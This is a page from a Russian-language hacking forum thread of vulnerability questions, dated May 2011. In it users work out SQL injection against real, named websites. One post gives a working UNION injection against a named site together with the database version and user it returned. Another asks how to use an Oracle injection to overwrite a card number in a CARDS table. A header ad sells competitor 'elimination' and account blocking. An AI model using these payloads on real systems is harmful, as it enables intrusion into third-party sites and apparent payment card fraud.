УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1699 из 2438

1699

Опции темы

Поиск в этой теме

Опции просмотра

#16981

13.05.2011, 17:20

M_script

Новичок

Регистрация: 04.11.2004

Сообщений: 5

Провел на форуме:
4512

Репутация: 0

Цитата:

Сообщение от winstrool

winstrool said:
а если так:

Да хоть так:

Код:

Code:
http://board.salle.com.ua/index.php?catid=2a--_asdqwe@fdMk,.asdl;|+5+$Kfd9

#16982

13.05.2011, 18:36

Expl0ited

Guest

Сообщений: n/a

Провел на форуме:
262707

Репутация: 935

Цитата:

Сообщение от M_script

M_script said:
Там нет скули. Все символы, кроме цифр пропускаются, поэтому приведенные выше запросы эквивалентны запросу

Код:

Code:
http://board.salle.com.ua/index.php?catid=259

ммм, вообще то там скорее есть уязвимость, т.к.

Код:

Code:
http://board.salle.com.ua/index.php?catid=25 // возвращает "Объявления раздела Продукты"
http://board.salle.com.ua/index.php?catid=0+or+25 // возвращает "Объявления раздела Продукты"
http://board.salle.com.ua/index.php?catid=0+or+24 // возвращает "Объявления раздела Оборудование"

из чего делаем вывод, что там просто фильтр-блэклист "вредных" символов и слов, обойти который я пока не смог

Да и запрос там такой:

Код:

Code:
select cat_name from board_category where cat_id = ДАННЫЕ

Исходя из этого:

Код:

Code:
http://board.salle.com.ua/index.php?catid[]=

#16983

13.05.2011, 18:42

M_script

Новичок

Регистрация: 04.11.2004

Сообщений: 5

Провел на форуме:
4512

Репутация: 0

Цитата:

Сообщение от Expl0ited

Expl0ited said:
из чего делаем вывод, что там просто фильтр-блэклист "вредных" символов и слов, обойти который я пока не смог

Я же написал - фильтруется все, кроме цифр.

0+or+25 вернет то же самое, что и 25, 025 или к примеру 0№*)_(hfb2JMU5

#16984

13.05.2011, 18:47

Expl0ited

Guest

Сообщений: n/a

Провел на форуме:
262707

Репутация: 935

Согласен, там скорее всего preg_match, т.к. он убирает из запроса всё кроме букв, т.е. при запросе

Код:

Code:
http://board.salle.com.ua/index.php?catid=25+order+by+10

он ничего не возвращает, а при запросе

Код:

Code:
http://board.salle.com.ua/index.php?catid=25+order+by+9

он возвращает 259 страницу:

Код:

Code:
http://board.salle.com.ua/index.php?catid=259

#16985

13.05.2011, 19:25

LiRvD082

Новичок

Регистрация: 04.10.2009

Сообщений: 1

Провел на форуме:
14740

Репутация: 0

HEEEEEEEEEELP!!

Есть oracle 10g sql injection вида:

Цитата:

Сообщение от None

http://site.com/index.php?mod=news')+or+1=utl_inaddr.get_host_addr ess((select+table_name+from+sys.user_tables+where+ rownum=1))--+

Можно ли как нибудь изменить значение в базе данных?

Например пробую так:

Цитата:

Сообщение от None

http://site.com/index.php?mod=news')+and+(update+CARDS+set+CARD_NU MBER='5454908770100000'+where+rownum=1)+from+dual--+

Выдает ошибку:

Цитата:

Сообщение от None

Ошибка исполнения запроса : ORA-00936: отсутствует выражение

Помогите плз!

#16986

13.05.2011, 19:27

FlaktW

Участник форума

Регистрация: 19.08.2009

Сообщений: 115

Провел на форуме:
111014

Репутация: 8

Помогите раскрутить, не знаю, как подступиться!

http://www.dougie-poynter.com/discography/release.php?id=23'

#16987

13.05.2011, 19:54

M_script

Новичок

Регистрация: 04.11.2004

Сообщений: 5

Провел на форуме:
4512

Репутация: 0

Цитата:

Сообщение от FlaktW

FlaktW said:
Помогите раскрутить, не знаю, как подступиться!
http://www.dougie-poynter.com/discography/release.php?id=23'

Запрос:

Код:

Code:
http://www.dougie-poynter.com/discography/release.php?id=-1/**/union/**//*!select*//**/1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15

Результат:

Код:

Code:
5.0.92-community:dougie_user@localhost:dougie_

#16988

13.05.2011, 20:36

M_script

Новичок

Регистрация: 04.11.2004

Сообщений: 5

Провел на форуме:
4512

Репутация: 0

LiRvD082, кинь ссылку в ЛС

#16989

14.05.2011, 17:01

guezd

Guest

Сообщений: n/a

Провел на форуме:
59658

Репутация: 81

что может означать символ "~" в конце расширения файла на фряхе ?

#16990

14.05.2011, 17:59

AleksNEW

Guest

Сообщений: n/a

Провел на форуме:
6893

Репутация: 0

_____________________

Страница 1699 из 2438

1699

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход